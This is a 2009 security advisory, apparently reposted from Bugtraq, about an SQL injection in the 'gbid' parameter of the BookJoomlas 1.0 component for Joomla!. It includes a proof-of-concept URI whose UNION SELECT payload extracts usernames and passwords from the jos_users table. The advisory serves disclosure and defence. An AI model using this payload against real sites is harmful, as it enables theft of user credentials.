|
Feeds -
Exploits
|
|
Written by Salvatore Fresta
|
|
Monday, 06 April 2009 23:02 |
Joomla! BookJoomlas Component 'gbid' Parameter SQL Injection Vulnerability
-\\Bugtraq ID: 34392
-\\Class: Input Validation Error
-\\CVE:
-\\Remote: Yes
-\\Local: No
-\\Published: Apr 06 2009 12:00AM
-\\Updated: Apr 06 2009 08:46PM
-\\Credit:
-\\Vulnerable: BookJoomlas 1.0
-\\Discussion The BookJoomlas component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
-\\Exploit(s)/PoC(s): Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/path/index.php?option=com_bookjoomlas& Itemid=26&func=comment&gbid=-1 UNION ALL SELECT 1,2,NULL, 4,NULL,6,7,NULL,9,CONCAT(username,0x3a,password),11,12,13,14,15,16 FROM jos_users
-\\Solution Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at:
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
.
-\\References(s) --BookJoomlas Project Page http://extensions.joomla.org/extensions/contacts-&-feedback/guest- book/1292/detail --Joomla Component com_bookjoomlas SQL Injection Vulnerability http://www.securityfocus.com/archive/1/50248 ("Salvatore \"drosophila\ " Fresta" )
|